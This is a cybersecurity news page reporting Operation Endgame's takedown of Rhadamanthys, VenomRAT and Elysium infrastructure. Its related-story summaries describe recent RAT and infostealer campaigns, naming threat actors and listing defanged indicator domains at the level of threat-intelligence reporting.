Operation Endgame Disrupts Rhadamanthys, VenomRAT, and Elysium Malware Operations
International law enforcement agencies, coordinated by Europol and Eurojust, executed a major crackdown on the infrastructures supporting the Rhadamanthys infostealer, VenomRAT remote access trojan, and the Elysium botnet. The operation, part of the ongoing Operation Endgame, resulted in the takedown of over 1,025 servers and the seizure of 20 domains used to control and distribute these malware families. Authorities also arrested the main suspect behind VenomRAT in Greece, and the dismantled infrastructure included hundreds of thousands of infected computers and millions of stolen credentials, with many victims unaware of the compromise. The operation involved law enforcement from at least nine countries and was supported by numerous private sector partners, including cybersecurity firms and threat intelligence organizations.
Rhadamanthys, a modular information stealer sold as malware-as-a-service, and VenomRAT, a commodity RAT favored by threat actors like TA558, were both widely distributed through email campaigns, malvertising, and other vectors. The Elysium botnet, less well-documented, was also linked to these operations, potentially serving as a proxy network for criminal activity. The disruption has caused significant operational issues for cybercriminals, with many reporting loss of access to their command-and-control panels and servers. Authorities have advised potential victims to check if their systems were compromised and to take remediation steps, as the takedown is expected to have a substantial impact on the cybercrime ecosystem.
Sources
5 more from sources like cso online, cyberthrone, data breaches net, securityaffairs and cyberscoop
Related Stories
Law Enforcement Disruption of Major Malware and Ransomware Operations
International law enforcement agencies have intensified efforts to disrupt the infrastructure of prominent malware and ransomware operations. Europol, as part of Operation Endgame, targeted the servers supporting the Rhadamanthys information stealer, resulting in a sudden loss of access for its operators and a halt in observed activity since late October 2025. Rhadamanthys, a C++-based stealer-as-a-service, had been widely distributed through phishing campaigns and malicious ads, with its latest version released in October 2025. The operation's impact on the long-term viability of Rhadamanthys remains to be seen, but the immediate effect has been a significant reduction in its activity. In parallel, law enforcement agencies across the US and Europe have made notable arrests and infrastructure takedowns targeting ransomware groups. The UK’s National Crime Agency apprehended a suspect linked to a ransomware attack that disrupted multiple European airports, while US authorities filed charges against the administrator of several notorious ransomware gangs and seized assets from a Zeppelin ransomware distributor. Additionally, a coordinated international operation dismantled the infrastructure of the BlackSuit ransomware group, further demonstrating the global commitment to combating cybercrime. These actions collectively signal a robust and ongoing crackdown on cybercriminal operations by international authorities.
3 months ago
Multiple malware campaigns using compromised websites and phishing lures to deliver RATs and stealers
Threat actors are using **compromised or spoofed websites** to trick victims into executing malware, with lures ranging from fake browser updates to counterfeit security-software download pages. Recorded Future’s Insikt Group reported that financially motivated **GrayCharlie** (overlapping with **SmartApeSG**) compromised multiple U.S. law-firm WordPress sites—potentially via a shared IT/marketing provider—and injected externally hosted JavaScript that redirected visitors to **bogus update pages** or **fake CAPTCHA** flows. Victims were prompted to run a PowerShell command via the Windows Run dialog, leading to **NetSupport RAT** installation and follow-on delivery of **Stealc** and **SectopRAT**; the operation’s infrastructure was noted as being supported by **MivoCloud** and **HZ Hosting Ltd.** Separately, Malwarebytes-linked reporting described a **typosquatting** campaign impersonating the Huorong antivirus site (`huoronga[.]com` vs. `huorong.cn`) to distribute **ValleyRAT** (built on the **Winos4.0** framework), attributed to the Chinese-speaking **Silver Fox APT**; the payload was routed through an intermediary domain and hosted on **Cloudflare R2**, with a ZIP masquerading as Huorong (`BR火绒445[.]zip`). In a different region and access vector, Group-IB reported Iran-linked **MuddyWater** running **Operation Olalampo** against MENA targets using **phishing emails** with malicious Office documents/macros to deploy new tooling including **GhostFetch** (dropping **GhostBackDoor**) and **CHAR** (a Rust backdoor controlled via a **Telegram bot**), plus variants using **HTTP_VIP** to deploy *AnyDesk*; the campaign also leveraged recently disclosed vulnerabilities on public-facing servers for initial access.
2 weeks ago
Malware campaigns abusing trusted software channels (browser extensions, developer tools, and Google Ads) to deliver RATs and stealers
Multiple active malware campaigns are abusing *trusted distribution channels*—including Chrome/Edge extensions, Visual Studio Code extensions, and Google Ads/redirection infrastructure—to trick users into executing payloads that deliver **remote access trojans (RATs)** or **information stealers**. Huntress reported a malvertising-driven fake ad blocker extension, **NexShield**, that intentionally forces Chrome/Edge into a crash/DoS state by looping `chrome.runtime` port connections; on restart it displays a fake “security warning” and uses a **ClickFix-style** social engineering flow (“CrashFix”) to push users to paste and run clipboard-copied commands that trigger an obfuscated PowerShell download-and-execute chain, ultimately deploying the Python-based **ModeloRAT** in corporate environments. Separately, Trend Micro described **Evelyn Stealer** delivered via a trojanized **Visual Studio Code extension** that drops a malicious `Lightshot.dll` side-loaded by legitimate *Lightshot* (`Lightshot.exe`), then runs staged PowerShell and payload retrieval to steal browser credentials, cookies, crypto wallets, VPN/Wi‑Fi data, files, and screenshots before exfiltrating to an attacker-controlled FTP server—posing elevated risk when developer workstations are compromised. South Korea-focused activity also features prominently across several reports, with multiple delivery vectors leading to RAT deployment. ASEC documented **Remcos RAT** distributed via fake installers masquerading as *VeraCrypt* and via gambling-related “lookup” tools, using multi-stage obfuscated **VBS/PowerShell** chains and enabling credential theft, keylogging, and device surveillance (webcam/mic). Genians attributed “**Operation Poseidon**” to the **Konni APT**, describing spear-phishing that abuses Google’s advertising/tracking redirection (e.g., `ad.doubleclick.net` parameters) to make malicious links appear legitimate, redirecting victims to compromised WordPress infrastructure hosting ZIPs with LNK files that launch AutoIt-based loaders to run an **EndRAT** variant in memory. Nextron Systems reported widespread trojanized “free converter” apps promoted via malicious Google ads and lookalike converter sites (e.g., `ez2convertapp[.]com`, `convertyfileapp[.]com`), with some payloads signed using abused/rotating code-signing certificates (e.g., BLUE TAKIN LTD, TAU CENTAURI LTD, SPARROW TIDE LTD) to evade trust checks while installing persistent backdoors.
1 months ago